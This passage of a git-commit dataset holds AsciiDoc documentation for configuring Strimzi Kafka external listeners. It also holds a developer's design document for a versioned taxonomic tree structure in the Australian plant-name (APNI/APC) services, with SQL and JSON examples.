port: 9094\n type: ingress\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n host: bootstrap.myingress.com\n brokers:\n - broker: 0\n host: broker-0.myingress.com\n - broker: 1\n host: broker-1.myingress.com\n - broker: 2\n host: broker-2.myingress.com\n# ...\n----\n\nBy default, `route` listener hosts are automatically assigned by OpenShift.\nHowever, you can override the assigned route hosts by specifying hosts.\n\nStrimzi does not perform any validation that the requested hosts are available.\nYou must ensure that they are free and can be used.\n\n.Example of host configuration for a route listener\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: route\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n host: bootstrap.myrouter.com\n brokers:\n - broker: 0\n host: broker-0.myrouter.com\n - broker: 1\n host: broker-1.myrouter.com\n - broker: 2\n host: broker-2.myrouter.com\n# ...\n----\n\n[id='property-listener-config-nodeport-{context}']\n=== `nodePort`\n\nBy default, the port numbers used for the bootstrap and broker services are automatically assigned by Kubernetes.\nYou can override the assigned node ports for `nodeport` listeners by specifying the requested port numbers.\n\nStrimzi does not perform any validation on the requested ports.\nYou must ensure that they are free and available for use.\n\n.Example of an external listener configured with overrides for node ports\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: nodeport\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n nodePort: 32100\n brokers:\n - broker: 0\n nodePort: 32000\n - broker: 1\n nodePort: 32001\n - broker: 2\n nodePort: 32002\n# ...\n----\n\n[id='property-listener-config-lb-ip-{context}']\n=== `loadBalancerIP`\n\nUse the `loadBalancerIP` property to request a specific IP address when creating a loadbalancer.\nUse this property when you need to use a loadbalancer with a specific IP address.\nThe `loadBalancerIP` field is ignored if the cloud provider does not support the feature.\n\n.Example of an external listener of type `loadbalancer` with specific loadbalancer IP address requests\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: loadbalancer\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n loadBalancerIP: 172.29.3.10\n brokers:\n - broker: 0\n loadBalancerIP: 172.29.3.1\n - broker: 1\n loadBalancerIP: 172.29.3.2\n - broker: 2\n loadBalancerIP: 172.29.3.3\n# ...\n----\n\n[id='property-listener-config-annotations-{context}']\n=== `annotations`\n\nUse the `annotations` property to add annotations to `loadbalancer`, `nodeport` or `ingress` listeners.\nYou can use these annotations to instrument DNS tooling such as {KubernetesExternalDNS}, which automatically assigns DNS names to the loadbalancer services.\n\n.Example of an external listener of type `loadbalancer` using `annotations`\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: loadbalancer\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-bootstrap.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n brokers:\n - broker: 0\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-0.mydomain.com.\n 
external-dns.alpha.kubernetes.io\/ttl: \"60\"\n - broker: 1\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-1.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n - broker: 2\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-2.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n# ...\n----\n","old_contents":"Configures bootstrap service overrides for external listeners.\n\nBroker service equivalents of `nodePort`, `host`, `loadBalancerIP` and `annotations` properties are configured in the xref:type-GenericKafkaListenerConfigurationBroker-reference[`GenericKafkaListenerConfigurationBroker` schema].\n\n[id='property-listener-config-altnames-{context}']\n=== `alternativeNames`\n\nYou can specify alternative names for the bootstrap service.\nThe names are added to the broker certificates and can be used for TLS hostname verification.\nThe `alternativeNames` property is applicable to all types of external listeners.\n\n.Example of an external `route` listener configured with an additional bootstrap address\n[source,yaml,subs=\"attributes+\"]\n----\nlisteners:\n #...\n - name: external\n port: 9094\n type: route\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n alternativeNames: example.hostname\n# ...\n----\n\n[id='property-listener-config-host-{context}']\n=== `host`\n\nThe `host` property is used with `route` and `ingress` listeners to specify the hostnames used by the bootstrap and per-broker services.\n\nA `host` property value is mandatory for `ingress` listener configuration, as the Ingress controller does not assign any hostnames automatically.\nMake sure that the hostnames resolve to the Ingress endpoints.\nStrimzi will not perform any validation that the requested hosts are available and properly routed to the Ingress endpoints.\n\n.Example of host configuration for an ingress listener\n[source,yaml,subs=\"attributes+\"]\n----\nlisteners:\n #...\n - name: external\n port: 9094\n type: ingress\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n host: bootstrap.myingress.com\n brokers:\n - broker: 0\n host: broker-0.myingress.com\n - broker: 1\n host: broker-1.myingress.com\n - broker: 2\n host: broker-2.myingress.com\n# ...\n----\n\nBy default, `route` listener hosts are automatically assigned by OpenShift.\nHowever, you can override the assigned route hosts by specifying hosts.\n\nStrimzi does not perform any validation that the requested hosts are available.\nYou must ensure that they are free and can be used.\n\n.Example of host configuration for a route listener\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: route\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n host: bootstrap.myrouter.com\n brokers:\n - broker: 0\n host: broker-0.myrouter.com\n - broker: 1\n host: broker-1.myrouter.com\n - broker: 2\n host: broker-2.myrouter.com\n# ...\n----\n\n[id='property-listener-config-nodeport-{context}']\n=== `nodePort`\n\nBy default, the port numbers used for the bootstrap and broker services are automatically assigned by Kubernetes.\nYou can override the assigned node ports for `nodeport` listeners by specifying the requested port numbers.\n\nStrimzi does not perform any validation on the requested ports.\nYou must ensure that they are free and available for use.\n\n.Example of an external listener configured with overrides for node ports\n[source,yaml,subs=\"attributes+\"]\n----\n# 
...\nlisteners:\n #...\n - name: external\n port: 9094\n type: nodeport\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n nodePort: 32100\n brokers:\n - broker: 0\n nodePort: 32000\n - broker: 1\n nodePort: 32001\n - broker: 2\n nodePort: 32002\n# ...\n----\n\n[id='property-listener-config-lb-ip-{context}']\n=== `loadBalancerIP`\n\nUse the `loadBalancerIP` property to request a specific IP address when creating a loadbalancer.\nUse this property when you need to use a loadbalancer with a specific IP address.\nThe `loadBalancerIP` field is ignored if the cloud provider does not support the feature.\n\n.Example of an external listener of type `loadbalancer` with specific loadbalancer IP address requests\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: loadbalancer\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n loadBalancerIP: 172.29.3.10\n brokers:\n - broker: 0\n loadBalancerIP: 172.29.3.1\n - broker: 1\n loadBalancerIP: 172.29.3.2\n - broker: 2\n loadBalancerIP: 172.29.3.3\n# ...\n----\n\n[id='property-listener-config-annotations-{context}']\n=== `annotations`\n\nUse the `annotations` property to add annotations to `loadbalancer`, `nodeport` or `ingress` listeners.\nYou can use these annotations to instrument DNS tooling such as {KubernetesExternalDNS}, which automatically assigns DNS names to the loadbalancer services.\n\n.Example of an external listener of type `loadbalancer` using `annotations`\n[source,yaml,subs=\"attributes+\"]\n----\n# ...\nlisteners:\n #...\n - name: external\n port: 9094\n type: loadbalancer\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-bootstrap.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n brokers:\n - broker: 0\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-0.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n - broker: 1\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-1.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n - broker: 2\n annotations:\n external-dns.alpha.kubernetes.io\/hostname: kafka-broker-2.mydomain.com.\n external-dns.alpha.kubernetes.io\/ttl: \"60\"\n# ...\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a051019b0fbb5ab62f01aa6f5284a059ab2c3096","subject":"Minor updates to the tree structure docs to indicate changes. TODO remove irrelevant stuff, this is versioned after all.","message":"Minor updates to the tree structure docs to indicate changes. TODO remove\nirrelevant stuff, this is versioned after all.\n","repos":"bio-org-au\/services,bio-org-au\/services,bio-org-au\/services","old_file":"docs\/NewTreeStructure.adoc","new_file":"docs\/NewTreeStructure.adoc","new_contents":"= New tree structure\nv1.0, June 2017\n:imagesdir: resources\/images\/\n:toc: left\n:toclevels: 4\n:toc-class: toc2\n:icons: font\n:iconfont-cdn: \/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/4.3.0\/css\/font-awesome.min.css\n:stylesdir: resources\/style\/\n:stylesheet: asciidoctor.css\n:description: New tree structure documentation\n:keywords: documentation, NSL, APNI, API, APC, tree\n:links:\n:numbered:\n\nThe current tree structure is over complicated and difficult to validate and maintain going forward. 
The reasons for this\nare many, but basically come down to a changing understanding of requirements.\n\nI propose to scale back and simplify the structure used to store the trees, to implement only what is currently required,\nand then evolve the implementation as needed.\n\nThe main change in requirements is the idea of using a workspace, or draft tree, to do work. The workspace would then be\npublished as a new version. Once a version is published it is immutable, _except_ for minor typographical changes as determined\nby policy.\n\n\nIMPORTANT: This work is designed to make the tree easy to understand and reason about, and therefore make it easier to\nchange and maintain over time, and to improve performance.\n\n== Requirements\n\n=== Major requirements:\n\n . The tree must store and display the parent-child taxonomic relationship between names.\n . The tree must be versioned so that a citation (id) of a tree element must reproduce the tree as it was when it was\n viewed.\n . A link to an element on the tree should be able to identify the version of the tree and reproduce that version.\n . You should be able to link to a _version_ of the tree and get the current tree easily.\n .. You should be able to compare taxa in different versions via an identifier. The identifier is unique to the _circumscribed_\n or enclosed taxa below this taxon. This identifier spans multiple versions of a tree. See <<taxon identifiers>>.\n . The tree must enforce strict rules about the placement of names on a tree.\n . Profile data including only Comment and Distribution data is to be stored in the tree structure.\n . Tree elements are pointers to an Instance as a representation of a Taxon Concept.\n . Tree elements can represent Accepted and Excluded items, which need to be distinguished. In practice this amounts to accepted\n and not accepted (but treated). \"Excluded\" is a covering term for a number of reasons these names are not accepted\n (e.g. doubtful), but the distinction is not required. As such, for now we can just indicate whether an element is Accepted or not.\n . It must be easy to work with a version of the tree.\n . All common operations must be fast. You should be able to query the status of a name on the current tree without\n noticeable delay.\n . Editors should be able to work on a draft version of the tree without it being public, then publish it at a time of\n their choosing.\n . Versions should be released as a unit of work, collecting a set of changes together (policy).\n . The users need to be able to add a log entry describing the work done and referencing the documents that led to the changes.\n . Multiple workspaces that can be merged over different time frames are a requirement.\n . It would be nice to be able to list and view older versions of the tree and see what changed (diffing).\n . It would be nice to be able to archive older versions of the tree without breaking it.\n . We want to access the trees through RDF.\n\n==== Uber trees\n\n . We must be able to create an \"uber tree\" from multiple sub trees.\n . The uber tree should be able to merge sub trees at multiple points - for example lichens have multiple connections\n to the fungi tree.\n . Uber tree elements need to link back to source tree nodes if compositional.\n\nAccording to https:\/\/www.environment.gov.au\/science\/abrs\/publications\/other\/numbers-living-species\/executive-summary[ABRS Numbers of Living Species in Australia and the World]\nthere are ~2 million species in the world that we should aim to handle in an uber tree.\n\n==== Use cases\n\n . 
creation of accepted taxonomic trees with strict hierarchical placement rules within a shard.\n . creation of a list of taxon concepts, commonly (only) from family down, known as a checklist, from one or more shards.\n These trees may have more relaxed placement rules.\n . creation of composite (uber) trees made from multiple sub trees, such as accepted taxonomic trees from multiple shards.\n\nWARNING: We should take a closer look at the needs of List compilers and Tree composers to see if the difference in the\n set of requirements leads to different solutions for each.\n\n==== Editors\n\nBased on the above use cases, and current editor usage, it looks like we need two different editing pathways for trees.\n\n . In-instance-editor tree editing: where the advanced editor can create specific taxonomic concepts for accepted trees\n in accordance with some authority such as CHAH.\n . A composition editor that can compose multiple trees into an uber tree, or create a checklist. This doesn't require the\n ability to edit instances, just to choose concepts, or other tree elements\/sections.\n\nPerhaps the second, compositional, editor is logically broken into an uber tree manager and a checklist editor.\n\n==== Search\n\nWe need to clearly define the difference between the search on names (the APNI search) and the search requirements on\ntrees. At the moment there is confusion because some searches in the advanced search are a mix of tree and name concerns.\n\nNOTE: Greg W. put this view forward too.\n\n===== use cases\n\n . search a tree for names under a name and bring back the results displaying the APNI or APC format output\n * search synonyms or accepted only\n * search based on native, naturalised, distribution or profile data.\n * further advanced filtering based on name\/instance type, tags, author etc.\n . search for names independent of any tree and display in APNI format - this may be an advanced search on name types,\n tags, instance types, and may require knowledge of the Family.\n . Name check - a specific check against the accepted tree in a shard.\n . check to see if a taxon is the same as another taxon, i.e. encloses the same sub taxa, via comparison of a taxon identifier.\n\n===== implementation (discussion)\n\nTree searches should be associated with the tree they are on because a tree may be separated from the name and instance\ndata it is pointing at. In the case of the uber trees they may be pointing to multiple shards.\n\nSince trees contain the name and instance id, but not instance data, a tree search may bring back a list of names that can\nin turn fetch APNI or APC format data via the existing service API (much like the existing service search).\n\nIf we want to implement a more closely coupled database implementation in the search we could link to multiple shard databases\nto get the data. *I prefer the previous solution as it allows fully autonomous trees and lists to exist that just use\nlinked data.* However, speed will need to be taken into account when looking at this, which means looking at whether the service\nAPIs need improving or the solution is limited to direct database connections.\n\nWe need to carefully consider what is offered in search and how you discover what can be searched... initially of course\nwe are publicly offering only the APC as a cross-shard search, and then moving up to NSL including AFD.\n\nTrees that are linked to a shard, e.g. 
the Vascular APC tree, that have a database relationship to the name and instance\ndata in the shard can take advantage of joins for more complex queries.\n\nCross shard searching in general needs an API approach where an API (which could be just a database connection) is used\nto collect data, then a map\/reduce\/sort approach is used to filter and sort results. The name paths and sort names will\nhelp in collating and sorting results from multiple sources.\n\nSee https:\/\/www.anbg.gov.au\/25jira\/browse\/NSL-2412[NSL-2312]\n\nAfter discussion with Greg Whitbread and following from user feedback and experience the use of the name tree search may\nbe a reflection of the way we use the \"product\" concept and clarification of how the sets of data can be used, and what\nthey should be used for.\n\nAt the moment we try and describe this in the APNI and APC product descriptions.\n\nAPNI\n****\nThe Australian Plant Name Index (APNI) is a tool for the botanical community that deals with plant names and their usage\nin the scientific literature, whether as a current name or synonym. APNI does not recommend any particular taxonomy or\nnomenclature. For a listing of currently accepted scientific names for the Australian vascular flora, please use the\nAustralian Plant Census (APC) link above.\n****\n\nAPC\n****\nThe Australian Plant Census (APC) is a list of the accepted scientific names for the Australian vascular flora, ferns,\ngymnosperms, hornworts and liverworts, both native and introduced, and includes synonyms and misapplications for these\nnames. The APC covers all published scientific plant names used in an Australian context in the taxonomic literature,\nbut excludes taxa known only from cultivation in Australia. The taxonomy and nomenclature adopted for the APC are endorsed\nby the Council of Heads of Australasian Herbaria (CHAH).\n****\n\nAs Greg points out though, we don't limit the search, because people are asking \"within\" questions from APNI. This\nquestion comes about because scientific names intrinsically, but unreliably, describe or imply rank and hierarchy\ninformation, except where they don't.\n\nIt seems to me that we need to explicitly combine the name and taxonomy searches and express clearly what it is the\nuser is asking: for example \"what is in the family Fabaceae according to Maberly\" or \"what is in the family Fabaceae\naccording to APC\" and then we can do useful things like \"compare the family Fabaceae according to Maberly and APC\"\n\nBy combining we can ask questions like \"What is not in APC but is in Maberly\" so long as we can emphasize the context\nof the APNI\/NSL dataset.\n\n=== Change over requirements:\n\n . We must maintain existing links to trees (APC) that have been used prior to this change. This means any links to\n existing nodes must resolve to the same instance data and position in the tree structure. The intrinsic data should not\n change, though extraneous data may be left out (broken links, some RDF identifiers that didn't lead to real data).\n . Editing the tree should work and be possible from the point of change over.\n\n== Concept\n\nThe concept for the new structure is to remove the need for link objects and simply copy the list of tree elements for\neach version of the tree. The Workspace is then a copy of the current tree that is then altered. When the workspace is\nready it is published as the latest version of the tree by making it the current version. 
A copy of the current version is then made to create the new workspace version.\n\nWe track changes in the tree by maintaining a previous link that points to the tree_element in the previous version.\n\nVersions are grouped by a tree_version, which is associated with a tree. Tree_elements are associated with a tree_version\nvia a linking tree_version_element table.\n\n Tree <- [Tree_Versions] <- [Tree_Version_Elements] <- [Tree_Elements]\n\nThe tree holds a pointer to the current version and a default workspace. Tree_version_element is a join table between tree\nversions and tree elements, and is the versioned view of a tree_element. This structure reduces duplication of data on\ncopying a tree, and holds a unique versioned identifier for an element in a tree.\n\nThis concept is storage efficient and simple. Excessive numbers of versions could create a lot of copied\ntree version elements, but the workspace\/publish model may also lead to a more structured release of versions\n(e.g. once a day\/week\/month) instead of on-the-fly changes.\n\n=== User concept\n\nVersions of a tree are Publications that can be referenced or cited. You can cite a published tree (version) using an\nidentifier for the _tree_version_ or using an identifier for a _tree_version_element_. This will return the element and\nthe entire tree in the context of the published tree.\n\n==== taxon identifiers\n\nEach tree_version_element also has an associated _taxon identifier_, which identifies the concept of the taxon in terms of\nthe data, including the circumscription of the taxon (i.e. the taxa under this taxon). The taxon identifier can be used to\ncompare taxa between versions, i.e. to see if the concept has changed.\n\nThe definition of a taxon for determining if it has changed is:\n\n* A taxon consists of the Name, its Instance and its children, where an Instance defines the usage of the Name in a\nreference and its Synonymy.\n* A taxon does *not* include the status (Excluded from this classification) or the Profile data (Comments and Distribution),\nwhich are part of the classification as published.\n\nA taxon will exist in many publications (versions) of a tree, so the distribution, comments and status may change over\nthe publications.\n\nNOTE: See <<Existing links,Existing links>> for resolving taxon identifiers.\n\n=== Autonomous trees\n\nTrees should be able to be autonomous from the shards. This means that database foreign keys to names and instances are\nnot enforced (i.e. no direct FK relationship). This means we need to rely on the link to identify the instances. It also\nmeans that we want to copy the data required to ask questions of the tree into the tree structure as much as possible.\n\nWhilst we will rely on the link to reference the data in the shards, we will store the instance and name id (as a Long),\nwhich also means that we need to store the source shard for the instance and name. If a placed name later becomes\nde-duplicated we may have to update the id by using the mapper (rare).\n\n=== Data usage vs speed\n\nCopying the tree for every version is less space efficient than the current model, but affords many benefits. 
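\n\nBefore looking at sizes, here is a minimal sketch of the structure just described. This is a sketch only; the table and column names are assumptions based on the description above, not the final schema.\n\n[source]\n.tree-structure-sketch.sql\n----\n-- Sketch only: names and columns are assumptions, not the final schema.\nCREATE TABLE tree (\n id BIGINT PRIMARY KEY,\n name TEXT NOT NULL,\n current_tree_version_id BIGINT, -- the published version\n default_draft_version_id BIGINT -- the workspace being edited\n);\n\nCREATE TABLE tree_version (\n id BIGINT PRIMARY KEY,\n tree_id BIGINT NOT NULL REFERENCES tree,\n previous_version_id BIGINT REFERENCES tree_version,\n published BOOLEAN NOT NULL DEFAULT FALSE\n);\n\n-- One row per placement; shared by every version that contains it.\nCREATE TABLE tree_element (\n id BIGINT PRIMARY KEY,\n previous_element_id BIGINT REFERENCES tree_element,\n instance_id BIGINT NOT NULL, -- no FK: trees are autonomous\n name_id BIGINT NOT NULL, -- no FK: trees are autonomous\n instance_link TEXT NOT NULL,\n name_link TEXT NOT NULL,\n excluded BOOLEAN NOT NULL DEFAULT FALSE,\n simple_name TEXT NOT NULL,\n profile JSONB,\n synonyms JSONB\n);\n\n-- The versioned object: an element in the context of one version.\nCREATE TABLE tree_version_element (\n element_link TEXT PRIMARY KEY, -- the versioned identifier\n tree_version_id BIGINT NOT NULL REFERENCES tree_version,\n tree_element_id BIGINT NOT NULL REFERENCES tree_element,\n taxon_id BIGINT NOT NULL, -- spans versions, see <<taxon identifiers>>\n tree_path TEXT NOT NULL, -- element ids from the root down\n name_path TEXT NOT NULL -- name elements from the root down\n);\n----\n\n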
At the current size of the APC tree, 35k tree_elements are required for each copy.\n\nNOTE: These are updated usage figures after spiking and importing actual data; the old guesstimate has been removed.\n\nAfter doing the spike and adding in all the additional data to make the trees autonomous we can compare actual data sizes.\nThese have been updated with the version join table instead of simple copies.\n\n\nIn APNI:\n\n|===\n| table | total size including indexes\n\n| tree_node\n| 284MB (inc 224MB index)\n\n| tree_event\n| 1328MB (inc 248kB index)\n\n| tree_link\n| 1434MB (inc 693MB index)\n\n| tree_element (152 versions)\n| 263MB (inc 95MB index)\n\n| tree_version_element (5.5M)\n| 4088MB (inc 2564MB index)\n|===\n\nwhich makes the new tree structure not much larger than the old one.\n\nNOTE: Prior to implementing the join table for version\/element links, the tree_element table was consuming ~40GB of data for 150\nversions. The totals of the table columns didn't add up to this amount, but there was something else the DB was doing to\nuse this space.\n\n==== Tree_Version_element \"link table\"\n\nInstead of copying the tree_elements each time, we just need to keep a link table of elements to tree versions, making\na many-to-many relationship. This adds a little complexity when archiving off older versions of trees, but at the same\ntime will reduce the need to archive.\n\nThe link table means that tree elements that don't change do not need to be copied. Copying a tree to a draft is a matter\nof adding the link table rows. New elements only participate in new trees.\n\nThis means we don't need to use a composite key for tree elements; we just use the element_id, which can become the id.\n\nThe reason why we didn't initially do this was that the old tree changes the parent node quite often based on something\nelse changing on this or another branch. But... a changing parent doesn't mean something changed above that node, though\nthere *may* have been a placement change.\n\nIf the parent of a node does actually change in some material way we need to insert a new tree_element at the point where\nthe change happens. *This is not easy.*\n\nA simpler compromise for this is to only create a new tree_element when the parent changes. This will still replicate a\nlot of redundant data.\n\nThe diagram below demonstrates the problem. Nodes 5, 6 and 7 have not changed; they have been added so that the tree from 5\ndown shows the addition of node 8. Node 3 is in both trees, it just has two parent links. We just want to have a version\n(say v2) point to 1, 2, 3, 4 and 8, which for two versions we could accomplish (if nothing above 8 changes) by using the previous\nnode link, but if you look at nodes 9, 10 and 11 it gets trickier to do.\n\nimage::multi-parent-node.svg[]\n\nWhat we need to do is compare the data in the nodes to check the parentage; in particular we need to check the instance\npath of the node. So for each daily version we create a tree based on instance path, where we have a unique tree_element\nfor each instance path. We then map the tree_elements to a version.\n\n. for each top node (daily) recurse down the tree creating a table of:\n. [instance path id], instance path, node id, instance id, name id, parent instance path id, version number\n. group by instance_path, aggregate version numbers, aggregate node_ids\n. generate new tree elements for each instance path, using the parent instance path to set the parent tree_element\n. 
add tree elements to versions\n\n\n==== Finding sizes\n\n[source]\n.table-size.sql\n----\nSELECT\n *,\n pg_size_pretty(total_bytes) AS total,\n pg_size_pretty(index_bytes) AS INDEX,\n pg_size_pretty(toast_bytes) AS toast,\n pg_size_pretty(table_bytes) AS TABLE\nFROM (\n SELECT\n *,\n total_bytes - index_bytes - COALESCE(toast_bytes, 0) AS table_bytes\n FROM (\n SELECT\n c.oid,\n nspname AS table_schema,\n relname AS TABLE_NAME,\n c.reltuples AS row_estimate,\n pg_total_relation_size(c.oid) AS total_bytes,\n pg_indexes_size(c.oid) AS index_bytes,\n pg_total_relation_size(reltoastrelid) AS toast_bytes\n FROM pg_class c\n LEFT JOIN pg_namespace n ON n.oid = c.relnamespace\n WHERE relkind = 'r'\n ) a\n ) a;\n----\n\nNOTE: The new data structure allows us to partition and archive older versions should we need to.\n\nCopying the 35k tree_elements to a workspace takes about 12.8 seconds, *however we only need to add join table\nrows to make a copy* which is much quicker, 850ms.\n\n insert into tree_version_tree_elements (tree_version_id, tree_element_id)\n SELECT 9703722, tree_element_id from tree_version_tree_elements where tree_version_id = 152;\n\n\n===== VM info:\n appsint1 24GB RAM (18GB used) 50GB space with ~27GB free for tomcat\n pgsql-prod1-ibis.it.csiro.au 6GB RAM (5GB used)\n \/dev\/mapper\/vg_data-lv_data 50G 981M 50G 2% \/pg_data\n \/dev\/mapper\/vg_back-lv_back 100G 16G 85G 16% \/pg_back\n \/dev\/mapper\/vg_tbl1-lv_tbl1 100G 8.3G 92G 9% \/pg_tbl1\n \/dev\/mapper\/vg_xlog-lv_xlog 20G 257M 20G 2% \/pg_xlog\n\n=== Multiple workspaces\n\nBecause a workspace is just a copy of a version of the tree with pointers to the previous version of it's tree_elements,\nwe can implement a merge of the latest tree or a version (like a branch in GIT). A workspace or draft version of the tree\nwould reference the version it is a copy of and when you go to publish it, we check that the version of the current\ntree has not changed. If it has you would need to merge the current version of the tree with your draft version. Where\nthere are conflicts, i.e. the current version has changed a tree_element that you have also changed you need to resolve\nthe conflict by either accepting the current version, overwriting the current version with yours, or somehow merging the\nchanges. The workflow for a merge of conflicting changes is the trickiest bit.\n\nWhere different workspaces are working in different branches of the tree auto merging would be possible.\n\nMultiple workspaces would make long running projects more feasible, e.g. adding a branch of orchids as a single update.\n\nTalking to the current APC editors they considered the ability to have multiple workspaces and merging as something that\n\"was always a requirement, really\"\n\n=== Building new trees\n\nA new tree starts with an initial draft version which can be\n\n . a copy of an existing tree\n . entirely new, adding elements to the root of the tree\n . made up of copies of portions of other trees, by copying from a node down and placing that section under a node in\n the draft.\n\nOnce the initial draft is ready to be made \"public\" it is published as the first version.\n\n=== Tree paths\n\nThe current name tree path concept would be incorporated into the new tree_elements to provide a rapid way to display,\nsort, and search for items under (subtending) an element (currently called a node). 
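\n\nAs a sketch, using the structure assumed above, finding everything under a placed element then becomes a single indexed prefix match on the stored path rather than a recursive tree walk:\n\n[source]\n.subtending-elements.sql\n----\n-- Sketch: all elements under a given element in one version.\n-- :version_id and :element_id are illustrative placeholders.\nSELECT child.*\nFROM tree_version_element parent\n JOIN tree_version_element child\n ON child.tree_version_id = parent.tree_version_id\n AND child.tree_path LIKE parent.tree_path || '\/%'\nWHERE parent.tree_version_id = :version_id\n AND parent.tree_element_id = :element_id\nORDER BY child.name_path;\n----\n\n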
We can then remove name_tree_path as\nan additional maintenance cost.\n\n=== Immutable\n\nThe immutability of published versions (apart from typographical fixes, mainly in the names\/references) means that we can\nuse de-normalisation of data to increase efficiency in display and queries. For example, storing a precomposed display\nstring for the tree, name and rank information (see name_tree_paths rank path and name path). This also makes trees largely\nstand alone when it comes to queries.\n\n****\nFor example you could search *just the tree elements* for a name string % abru% in family\nFabaceae of rank species that are native to WA.\n****\n\nThis will greatly improve the speed and simplicity of searches, especially given the right indexes.\n\nSince links are also immutable they can also be stored to reduce round trips to the mapper.\n\n=== Synonyms\n\nTo further make trees autonomous we need to store the synonyms of the name in the tree element data. This can be achieved\nby storing a names string, similar to the name path, that contains all the synonyms of the name separated by a pipe.\n\n e.g.\n |Acacia mucronata subsp. mucronata|Acacia mucronata var. linearis|Acacia mucronata var. mucronata|Racosperma mucronatum subsp. mucronatum\n\nThis means you can do a search for a name on a tree including the synonyms by doing:\n\n select * from tree_element where names like '%|Acacia mucronata var. linearis%';\n\nNOTE: after implementing the names string and testing various queries the speed benefit of having the synonyms in this\nformat wasn't there and the use cases need the extra information. So I have removed the names string format and just left\nthe synonyms jsonb data. Greg W pointed out it might be worth splitting synonyms into synonyms and relationships.\nI have replaced that string with a synonyms_html string for displaying the nomenclatural, taxanomic and missapplications.\n\nA jsonb synonyms field stores more synonym data. To do a synonym search on a JSONB field and take advantage of gin\nindexing we need to carefully structure the JSON data around a common search. This probably means grouping the synonyms\ninto relationship types e.g.\n\n[source,javascript]\n.synonyms.json\n----\n{\n \"Isoetes drummondii var. anomala\" : {\n \"mis\" : false,\n \"nom\" : true,\n \"tax\" : false,\n \"type\" : \"nomenclatural synonym\",\n \"cites\" : \"Britton, D.M. & Brunton, D.F.(1991), < i > Fern Gazette < \/i> 14\",\n \"name_id\" : 205871,\n \"full_name_html\": \"<scientific><name id='205871'><scientific><name id='64421'><scientific><name id='64341'><element class='Isoetes'>Isoetes<\/ element > < \/name><\/ scientific > < element class = 'drummondii' > drummondii < \/element><\/ name > < \/scientific> <rank id='54412'>var.<\/ rank > < element class = 'anomala' > anomala < \/element> <authors><ex id='7577' title='Marsden, C.R.'>C.R.Marsden<\/ ex > ex < author id = '5138' title = 'Britton,D.M. & amp; Brunton ,D.F.'>D.M.Britton & D.F.Brunt.<\/author><\/authors><\/name><\/scientific>\"\n },\n \"Isoetes drummondii subsp. nov. (polyploid)\": {\n \"mis\" : false,\n \"nom\" : true,\n \"tax\" : false,\n \"type\" : \"nomenclatural synonym\",\n \"cites\" : \"Ross, J.H.in Ross, J.H.(ed.)(1993), < i > A Census of the Vascular Plants of Victoria < \/i> Edn. 
4\",\n \"name_id\" : 205964,\n \"full_name_html\": \"<scientific><name id='205964'><scientific><name id='64421'><scientific><name id='64341'><element class='Isoetes'>Isoetes<\/ element > < \/name><\/ scientific > < element class = 'drummondii' > drummondii < \/element><\/ name > < \/scientific> <rank id='54410'>subsp.<\/ rank > < element class = 'nov. (polyploid)' > nov.(polyploid) < \/element> <authors><author id='7781' title='Ross, J.H.'>J.H.Ross<\/ author > < \/authors><\/ name > < \/scientific>\"\n }\n}\n----\n\n=== Profile data \/ attributes\n\nThe Profile data will be stored as a JSON object\/document field in the tree_element. This allows arbitrary extension of the\nprofile data to be stored. It also provides a consistent versioned view of the Profile data. e.g.\n\n[source,javascript]\n.profile.json\n----\n{\n \"APC Dist.\" : {\n \"value\" : \"Tas\",\n \"source_id\" : 9928,\n \"created_at\" : \"2007-06-06T00:00:00+10:00\",\n \"created_by\" : \"APNI-NSL MIGRATION\",\n \"updated_at\" : \"2007-06-06T00:00:00+10:00\",\n \"updated_by\" : \"APNI-NSL MIGRATION\",\n \"source_system\": \"APC_CONCEPT\"\n },\n \"APC Comment\": {\n \"value\" : \"Previous references to this species on mainland Australia refer to I. muelleri (Chinnock, 1998).\",\n \"source_id\" : 9928,\n \"created_at\" : \"2007-06-06T00:00:00+10:00\",\n \"created_by\" : \"APNI-NSL MIGRATION\",\n \"updated_at\" : \"2007-06-06T00:00:00+10:00\",\n \"updated_by\" : \"APNI-NSL MIGRATION\",\n \"source_system\": \"APC_CONCEPT\"\n }\n}\n----\n\n\n\n==== Comments\n\nComments will be stored as a text comment field in the JSON profile data.\n\n==== Distribution\n\nDistribution data is currently just unstructured and unvalidated text. However a *lot* of the requests for information\nrely on the 